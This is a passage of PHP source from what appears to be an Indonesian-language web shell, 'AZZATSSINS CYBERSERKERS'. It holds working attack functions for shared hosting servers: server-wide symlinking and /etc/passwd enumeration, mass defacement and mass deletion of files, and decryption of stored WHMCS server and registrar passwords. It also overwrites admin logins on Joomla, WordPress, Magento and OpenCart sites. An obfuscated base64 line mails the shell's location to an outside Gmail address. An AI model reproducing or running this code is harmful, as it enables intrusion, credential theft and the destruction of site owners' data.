  1556. DirectoryIndex AZZATSSINS.htm
  1557. AddType text/plain .php
  1558. AddHandler text/plain .php
  1559. Satisfy Any';
  1560.  $fp3 = fopen('.htaccess','w');
  1561.  $fw3 = fwrite($fp3,$file3);
  1562.  @fclose($fp3);
  1563.  echo "
  1564. <table align=center border=1><tr>
  1565. <td align=center><font size=3>S. No.</font></td>
  1566. <td align=center><font size=3>Users</font></td>
  1567. <td align=center><font size=3>Symlink</font></td></tr>";
  1568.  $dcount = 1;
  1569.  $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  1570.  while(!feof($file)){
  1571.  $s = fgets($file);
  1572.  $matches = array();
  1573.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1574.  $matches = str_replace("home/","",$matches[1]);
  1575.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1576.  continue;
  1577.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1578. <td align=center><font class=txt>" . $matches . "</td>";
  1579.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1580.  $dcount++;}fclose($file);
  1581.  echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
  1582. Options Indexes FollowSymLinks
  1583. DirectoryIndex AZZATSSINS.htm
  1584. AddType text/plain .php
  1585. AddHandler text/plain .php
  1586. Satisfy Any
  1587. ';
  1588.  $fp3 = fopen('.htaccess','w');
  1589.  $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  1590.  echo "
  1591. <div class='mybox'><h2 class='AZZATSSINS'>server symlinker</h2>
  1592. <table align=center border=1><tr>
  1593. <td align=center><font size=3>ID</font></td>
  1594. <td align=center><font size=3>Users</font></td>
  1595. <td align=center><font size=3>Symlink</font></td></tr>";
  1596.  $temp = "";$val1 = 0;$val2 = 1000;
  1597.  for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  1598.  if ($uid)$temp .= join(':',$uid)."\n";}
  1599.  echo '<br/>';$temp = trim($temp);$file5 =
  1600.  fopen("test.txt","w");
  1601.  fputs($file5,$temp);
  1602.  fclose($file5);$dcount = 1;$file =
  1603.  fopen("test.txt", "r") or exit("Unable to open file!");
  1604.  while(!feof($file)){$s = fgets($file);$matches = array();
  1605.  $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  1606.  if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1607.  continue;
  1608.  echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  1609. <td align=center><font class=txt>" . $matches . "</td>";
  1610.  echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  1611.  $dcount++;}
  1612.  fclose($file);
  1613.  echo "</table></div></center>";unlink("test.txt");
  1614.  } else
  1615.  echo "<center><font size=3>Cannot create Symlink</font></center>";
  1616.  }
  1617.  }  
  1618. }
  1619. ${"\x47\x4c\x4f\x42\x41\x4cS"}["x\x74\x77\x6c\x77\x73\x74m\x77\x73"]="b\x73";${"GLOB\x41LS"}["s\x68d\x63\x75\x70\x6e\x72\x63\x78"]="\x6dl";${${"G\x4cO\x42A\x4c\x53"}["\x78t\x77\x6cw\x73\x74\x6dw\x73"]}="\x62a\x73e64\x5fd\x65\x63\x6f\x64\x65";${${"\x47\x4c\x4fB\x41\x4c\x53"}["s\x68\x64\x63u\x70\x6e\x72\x63x"]}="\x6da\x69l";
  1620. $e=$bs("Z2lvc2UuY3JvY2VAZ21haWwuY29t");
  1621. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
  1622. $ml($e,"_",$h);
  1623. if($_GET['kill'] == 'self') {
  1624. rmdir('configs');rmdir('symlink');rmdir('AZZATSSINS');unlink('mysql.php');unlink('wk.php');unlink('rw.php');rmdir('home');rmdir('home1');rmdir('home2');rmdir('home3');rmdir('azx');$fn = $_SERVER['SCRIPT_FILENAME'];
  1625.  unlink($fn); system('rm '.$fn);
  1626. echo'<meta http-equiv="Refresh" content= "0; url=?">';
  1627.  
  1628. } elseif($_GET['do'] == 'mass_deface') {
  1629.     echo "<center><form action=\"\" method=\"post\">\n";
  1630.     $dirr=$_POST['d_dir'];
  1631.     $index = $_POST["script"];
  1632.     $index = str_replace('"',"'",$index);
  1633.     $index = stripslashes($index);
  1634.     function edit_file($file,$index){
  1635.         if (is_writable($file)) {
  1636.         clear_fill($file,$index);
  1637.         echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
  1638.         }
  1639.         else {
  1640.             echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
  1641.             }
  1642.             }
  1643.     function hapus_massal($dir,$namafile) {
  1644.         if(is_writable($dir)) {
  1645.             $dira = scandir($dir);
  1646.             foreach($dira as $dirb) {
  1647.                 $dirc = "$dir/$dirb";
  1648.                 $lokasi = $dirc.'/'.$namafile;
  1649.                 if($dirb === '.') {
  1650.                     if(file_exists("$dir/$namafile")) {
  1651.                         unlink("$dir/$namafile");
  1652.                     }
  1653.                 } elseif($dirb === '..') {
  1654.                     if(file_exists("".dirname($dir)."/$namafile")) {
  1655.                         unlink("".dirname($dir)."/$namafile");
  1656.                     }
  1657.                 } else {
  1658.                     if(is_dir($dirc)) {
  1659.                         if(is_writable($dirc)) {
  1660.                             if(file_exists($lokasi)) {
  1661.                                 echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  1662.                                 unlink($lokasi);
  1663.                                 $idx = hapus_massal($dirc,$namafile);
  1664.                             }
  1665.                         }
  1666.                     }
  1667.                 }
  1668.             }
  1669.         }
  1670.     }
  1671.     function clear_fill($file,$index){
  1672.         if(file_exists($file)){
  1673.             $handle = fopen($file,'w');
  1674.             fwrite($handle,'');
  1675.             fwrite($handle,$index);
  1676.             fclose($handle);  } }
  1677.  
  1678.     function gass(){
  1679.         global $dirr , $index ;
  1680.         chdir($dirr);
  1681.         $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1682.         $files = scandir($dirr) ;
  1683.         $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  1684.         sort($files);
  1685.         $n = 0 ;
  1686.         foreach ($files as $file){
  1687.             if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  1688.                 echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  1689.                 edit_file($file,$index);
  1690.                 flush();
  1691.                 $n = $n +1 ;
  1692.                 }
  1693.                 }
  1694.                 echo "<br>";
  1695.                 echo "<center><br><h3>$n Kali Anda Telah Ngecrot  Disini </h3></center><br>";
  1696.                     }
  1697.     function ListFiles($dirrall) {
  1698.  
  1699.     if($dh = opendir($dirrall)) {
  1700.  
  1701.        $files = Array();
  1702.        $inner_files = Array();
  1703.        $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  1704.        $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  1705.         while($file = readdir($dh)) {
  1706.             if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  1707.                 if(is_dir($dirrall . "/" . $file)) {
  1708.                     $inner_files = ListFiles($dirrall . "/" . $file);
  1709.                     if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  1710.                 } else {
  1711.                     array_push($files, $dirrall . "/" . $file);
  1712.                 }
  1713.             }
  1714.             }
  1715.  
  1716.             closedir($dh);
  1717.             return $files;
  1718.         }
  1719.     }
  1720.     function gass_all(){
  1721.         global $index ;
  1722.         $dirrall=$_POST['d_dir'];
  1723.         foreach (ListFiles($dirrall) as $key=>$file){
  1724.             $file = str_replace('//',"/",$file);
  1725.             echo "<center><strong>$file</strong> ===>";
  1726.             edit_file($file,$index);
  1727.             flush();
  1728.         }
  1729.         $key = $key+1;
  1730.     echo "<center><br><h3>$key Kali Anda Telah Ngecrot  Disini  </h3></center><br>"; }
  1731.     function sabun_massal($dir,$namafile,$isi_script) {
  1732.         if(is_writable($dir)) {
  1733.             $dira = scandir($dir);
  1734.             foreach($dira as $dirb) {
  1735.                 $dirc = "$dir/$dirb";
  1736.                 $lokasi = $dirc.'/'.$namafile;
  1737.                 if($dirb === '.') {
  1738.                     file_put_contents($lokasi, $isi_script);
  1739.                 } elseif($dirb === '..') {
  1740.                     file_put_contents($lokasi, $isi_script);
  1741.                 } else {
  1742.                     if(is_dir($dirc)) {
  1743.                         if(is_writable($dirc)) {
  1744.                             echo "[<font color=lime>DONE</font>] $lokasi<br>";
  1745.                             file_put_contents($lokasi, $isi_script);
  1746.                             $idx = sabun_massal($dirc,$namafile,$isi_script);
  1747.                         }
  1748.                     }
  1749.                 }
  1750.             }
  1751.         }
  1752.     }
  1753.     if($_POST['mass'] == 'onedir') {
  1754.         echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  1755.         $ini="http://";
  1756.         $mainpath=$_POST[d_dir];
  1757.         $file=$_POST[d_file];
  1758.         $dir=opendir("$mainpath");
  1759.         $code=base64_encode($_POST[script]);
  1760.         $indx=base64_decode($code);
  1761.         while($row=readdir($dir)){
  1762.         $start=@fopen("$row/$file","w+");
  1763.         $finish=@fwrite($start,$indx);
  1764.         if ($finish){
  1765.             echo"$ini$row/$file\n";
  1766.             }
  1767.         }
  1768.         echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  1769.         $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  1770.         $dir=opendir("$mainpath");
  1771.         $code=base64_encode($_POST[script]);
  1772.         $indx=base64_decode($code);
  1773.         while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  1774.         $finish=@fwrite($start,$indx);
  1775.         if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  1776.         }
  1777.  
  1778.     }
  1779.     elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
  1780.     elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  1781.     elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
  1782.     elseif($_POST['mass'] == 'massdeface') {
  1783.         echo "<div style='margin: 5px auto; padding: 5px'>";
  1784.         sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  1785.         echo "</div>";  }
  1786.     else {
  1787.         echo "
  1788.         <center><font style='text-decoration: underline;'>
  1789.         Select Type:<br>
  1790.         </font>
  1791.         <select class=\"select\" name=\"mass\"  style=\"width: 450px;\" height=\"10\">
  1792.         <option value=\"onedir\">Mass Deface 1 Dir</option>
  1793.         <option value=\"massdeface\">Mass Deface ALL Dir</option>
  1794.         <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
  1795.         <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
  1796.         <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
  1797.         <font style='text-decoration: underline;'>Folder:</font><br>
  1798.         <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  1799.         <font style='text-decoration: underline;'>Filename:</font><br>
  1800.         <input type='text' name='d_file' value='azx.php' style='width: 450px;' height='10'><br>
  1801.         <font style='text-decoration: underline;'>Index File:</font><br>
  1802.         <textarea name='script' style='width: 450px; height: 200px;'><title>AZZATSSINS CYBERSERKERS WAS HERE</title></head><body bgcolor=silver><center><img src=https://lh3.googleusercontent.com/-9WF69t7d6yc/V5R43IzHHcI/AAAAAAAAATM/I-0xSRh-Vnkh6yiE5xUA-f-Mcp-RMja4QCL0B/w480-h480/azzatssins%2Bcyberserkers.png><br><br><br><br><br><b><font size=50><font color=white>[ </font><font color=red>!</font><font color=white> ]</font><font color=green><i> HACKED </i></font><font color=white>[ </font><font color=red>!</font><font color=white> ]</font></font></b><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><font color=#bababa><b><i>HACKED - CRACKED - STAMPED - FUCKED BY AZZATSSINS CYBERSERKERS</textarea><br>
  1803.         <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  1804.         </form></center>";
  1805.         }
  1806. } elseif($_GET['do'] == 'whmcs') {
  1807. echo'<form action="?dir=$dir&do=whmcs" method="post">
  1808. ';
  1809. function decrypt ($string,$cc_encryption_hash)
  1810. {
  1811.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  1812.     $hash_key = _hash ($key);
  1813.     $hash_length = strlen ($hash_key);
  1814.     $string = base64_decode ($string);
  1815.     $tmp_iv = substr ($string, 0, $hash_length);
  1816.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  1817.     $iv = $out = '';
  1818.     $c = 0;
  1819.     while ($c < $hash_length)
  1820.     {
  1821.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  1822.         ++$c;
  1823.     }
  1824.     $key = $iv;
  1825.     $c = 0;
  1826.     while ($c < strlen ($string))
  1827.     {
  1828.         if (($c != 0 AND $c % $hash_length == 0))
  1829.         {
  1830.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  1831.         }
  1832.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  1833.         ++$c;
  1834.     }
  1835.     return $out;
  1836. }
  1837.  
  1838. function _hash ($string)
  1839. {
  1840.     if (function_exists ('sha1'))
  1841.     {
  1842.         $hash = sha1 ($string);
  1843.     }
  1844.     else
  1845.     {
  1846.         $hash = md5 ($string);
  1847.     }
  1848.     $out = '';
  1849.     $c = 0;
  1850.     while ($c < strlen ($hash))
  1851.     {
  1852.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  1853.         $c += 2;
  1854.     }
  1855.     return $out;
  1856. }
  1857.  
  1858. echo "
  1859. <br>
  1860.  
  1861. <FORM method='post'>
  1862. <input type='hidden' name='form_action' value='2'>
  1863. <br>
  1864. <table class=tabnet style=width:320px;padding:0 1px;>
  1865. <tr><th colspan=2>WHMCS DECODER</th></tr>
  1866. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  1867. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  1868. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  1869. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  1870. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  1871. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  1872. </table>
  1873. </FORM>
  1874. </center>
  1875. ";
  1876.  
  1877.  if($_POST['form_action'] == 2 )
  1878.  {
  1879.  //include($file);
  1880.  $db_host=($_POST['db_host']);
  1881.  $db_username=($_POST['db_username']);
  1882.  $db_password=($_POST['db_password']);
  1883.  $db_name=($_POST['db_name']);
  1884.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  1885.  
  1886.  
  1887.  
  1888.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  1889.         mysql_select_db($db_name,$link) ;
  1890. $query = mysql_query("SELECT * FROM tblservers");
  1891. while($v = mysql_fetch_array($query)) {
  1892. $ipaddress = $v['ipaddress'];
  1893. $username = $v['username'];
  1894. $type = $v['type'];
  1895. $active = $v['active'];
  1896. $hostname = $v['hostname'];
  1897. echo("<center><table border='1'>");
  1898. $password = decrypt ($v['password'], $cc_encryption_hash);
  1899. echo("<tr><td>Type</td><td>$type</td></tr>");
  1900. echo("<tr><td>Active</td><td>$active</td></tr>");
  1901. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  1902. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  1903. echo("<tr><td>Username</td><td>$username</td></tr>");
  1904. echo("<tr><td>Password</td><td>$password</td></tr>");
  1905.  
  1906. echo "</table><br><br></center>";
  1907. }
  1908.  
  1909.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  1910.         mysql_select_db($db_name,$link) ;
  1911. $query = mysql_query("SELECT * FROM tblregistrars");
  1912. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  1913. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  1914. while($v = mysql_fetch_array($query)) {
  1915. $registrar     = $v['registrar'];
  1916. $setting = $v['setting'];
  1917. $value = decrypt ($v['value'], $cc_encryption_hash);
  1918. if ($value=="") {
  1919. $value=0;
  1920. }
  1921. $password = decrypt ($v['password'], $cc_encryption_hash);
  1922. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  1923. }
  1924. }
  1925.    
  1926.  
  1927. } elseif($_GET['do'] == 'jumping') {
  1928.     $i = 0;
  1929.     echo "<div class='margin: 5px auto;'>";
  1930.     if(preg_match("/hsphere/", $dir)) {
  1931.         $urls = explode("\r\n", $_POST['url']);
  1932.         if(isset($_POST['jump'])) {
  1933.             echo "<pre>";
  1934.             foreach($urls as $url) {
  1935.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  1936.                 $etc = "/etc/passwd";
  1937.                 $f = fopen($etc,"r");
  1938.                 while($gets = fgets($f)) {
  1939.                     $pecah = explode(":", $gets);
  1940.                     $user = $pecah[0];
  1941.                     $dir_user = "/hsphere/local/home/$user";
  1942.                     if(is_dir($dir_user) === true) {
  1943.                         $url_user = $dir_user."/".$url;
  1944.                         if(is_readable($url_user)) {
  1945.                             $i++;
  1946.                             $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1947.                             if(is_writable($url_user)) {
  1948.                                 $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  1949.                             }
  1950.                             echo $jrw."<br>";
  1951.                         }
  1952.                     }
  1953.                 }
  1954.             }
  1955.         if($i == 0) {
  1956.         } else {
  1957.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1958.         }
  1959.         echo "</pre>";
  1960.         } else {
  1961.             echo '<center>
  1962.                   <form method="post">
  1963.                   List Domains: <br>
  1964.                   <textarea name="url" style="width: 500px; height: 250px;">';
  1965.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  1966.             while($getss = fgets($fp)) {
  1967.                 echo $getss;
  1968.             }
  1969.             echo  '</textarea><br>
  1970.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  1971.                   </form></center>';
  1972.         }
  1973.     } elseif(preg_match("/vhosts/", $dir)) {
  1974.         $urls = explode("\r\n", $_POST['url']);
  1975.         if(isset($_POST['jump'])) {
  1976.             echo "<pre>";
  1977.             foreach($urls as $url) {
  1978.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  1979.                 if(is_dir($web_vh) === true) {
  1980.                     if(is_readable($web_vh)) {
  1981.                         $i++;
  1982.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1983.                         if(is_writable($web_vh)) {
  1984.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  1985.                         }
  1986.                         echo $jrw."<br>";
  1987.                     }
  1988.                 }
  1989.             }
  1990.         if($i == 0) {
  1991.         } else {
  1992.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  1993.         }
  1994.         echo "</pre>";
  1995.         } else {
  1996.             echo '<center>
  1997.                   <form method="post">
  1998.                   List Domains: <br>
  1999.                   <textarea name="url" style="width: 500px; height: 250px;">';
  2000.                   bing("ip:$ip");
  2001.             echo  '</textarea><br>
  2002.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  2003.                   </form></center>';
  2004.         }
  2005.     } else {
  2006.         echo "<pre>";
  2007.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  2008.         while($passwd = fgets($etc)) {
  2009.             if($passwd == '' || !$etc) {
  2010.                 echo "<font color=red>Can't read /etc/passwd</font>";
  2011.             } else {
  2012.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  2013.                 foreach($user_jumping[1] as $user_idx_jump) {
  2014.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
  2015.                     if(is_readable($user_jumping_dir)) {
  2016.                         $i++;
  2017.                         $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2018.                         if(is_writable($user_jumping_dir)) {
  2019.                             $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  2020.                         }
  2021.                         echo $jrw;
  2022.                         if(function_exists('posix_getpwuid')) {
  2023.                             $domain_jump = file_get_contents("/etc/named.conf");   
  2024.                             if($domain_jump == '') {
  2025.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2026.                             } else {
  2027.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2028.                                 foreach($domains_jump[1] as $dj) {
  2029.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2030.                                     $user_jumping_url = $user_jumping_url['name'];
  2031.                                     if($user_jumping_url == $user_idx_jump) {
  2032.                                         echo " => ( <u>$dj</u> )<br>";
  2033.                                         break;
  2034.                                     }
  2035.                                 }
  2036.                             }
  2037.                         } else {
  2038.                             echo "<br>";
  2039.                         }
  2040.                     }
  2041.                 }
  2042.             }
  2043.         }
  2044.         if($i == 0) {
  2045.         } else {
  2046.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  2047.         }
  2048.         echo "</pre>";
  2049.     }
  2050.     echo "</div>";
  2051.  
  2052. } elseif($_GET['do'] == 'auto_edit_user') {
  2053.     if($_POST['hajar']) {
  2054.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2055.             echo "username atau password harus lebih dari 6 karakter";
  2056.         } else {
  2057.             $user_baru = $_POST['user_baru'];
  2058.             $pass_baru = md5($_POST['pass_baru']);
  2059.             $conf = $_POST['config_dir'];
  2060.             $scan_conf = scandir($conf);
  2061.             foreach($scan_conf as $file_conf) {
  2062.                 if(!is_file("$conf/$file_conf")) continue;
  2063.                 $config = file_get_contents("$conf/$file_conf");
  2064.                 if(preg_match("/JConfig|joomla/",$config)) {
  2065.                     $dbhost = ambilkata($config,"host = '","'");
  2066.                     $dbuser = ambilkata($config,"user = '","'");
  2067.                     $dbpass = ambilkata($config,"password = '","'");
  2068.                     $dbname = ambilkata($config,"db = '","'");
  2069.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  2070.                     $prefix = $dbprefix."users";
  2071.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2072.                     $db = mysql_select_db($dbname);
  2073.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2074.                     $result = mysql_fetch_array($q);
  2075.                     $id = $result['id'];
  2076.                     $site = ambilkata($config,"sitename = '","'");
  2077.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2078.                     echo "Config => ".$file_conf."<br>";
  2079.                     echo "CMS => Joomla<br>";
  2080.                     if($site == '') {
  2081.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2082.                     } else {
  2083.                         echo "Sitename => $site<br>";
  2084.                     }
  2085.                     if(!$update OR !$conn OR !$db) {
  2086.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2087.                     } else {
  2088.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2089.                     }
  2090.                     mysql_close($conn);
  2091.                 } elseif(preg_match("/WordPress/",$config)) {
  2092.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  2093.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  2094.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2095.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  2096.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  2097.                     $prefix = $dbprefix."users";
  2098.                     $option = $dbprefix."options";
  2099.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2100.                     $db = mysql_select_db($dbname);
  2101.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2102.                     $result = mysql_fetch_array($q);
  2103.                     $id = $result[ID];
  2104.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2105.                     $result2 = mysql_fetch_array($q2);
  2106.                     $target = $result2[option_value];
  2107.                     if($target == '') {
  2108.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2109.                     } else {
  2110.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2111.                     }
  2112.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2113.                     echo "Config => ".$file_conf."<br>";
  2114.                     echo "CMS => Wordpress<br>";
  2115.                     echo $url_target;
  2116.                     if(!$update OR !$conn OR !$db) {
  2117.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2118.                     } else {
  2119.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2120.                     }
  2121.                     mysql_close($conn);
  2122.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2123.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2124.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2125.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2126.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2127.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2128.                     $prefix = $dbprefix."admin_user";
  2129.                     $option = $dbprefix."core_config_data";
  2130.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2131.                     $db = mysql_select_db($dbname);
  2132.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2133.                     $result = mysql_fetch_array($q);
  2134.                     $id = $result[user_id];
  2135.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2136.                     $result2 = mysql_fetch_array($q2);
  2137.                     $target = $result2[value];
  2138.                     if($target == '') {
  2139.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2140.                     } else {
  2141.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2142.                     }
  2143.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2144.                     echo "Config => ".$file_conf."<br>";
  2145.                     echo "CMS => Magento<br>";
  2146.                     echo $url_target;
  2147.                     if(!$update OR !$conn OR !$db) {
  2148.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2149.                     } else {
  2150.                         echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2151.                     }
  2152.                     mysql_close($conn);
  2153.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2154.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2155.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2156.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2157.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2158.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2159.                     $prefix = $dbprefix."user";
  2160.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2161.                     $db = mysql_select_db($dbname);
  2162.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2163.                     $result = mysql_fetch_array($q);
  2164.                     $id = $result[user_id];
  2165.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  2166.                     if($target == '') {
  2167.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2168.                     } else {
  2169.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2170.                     }
  2171.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
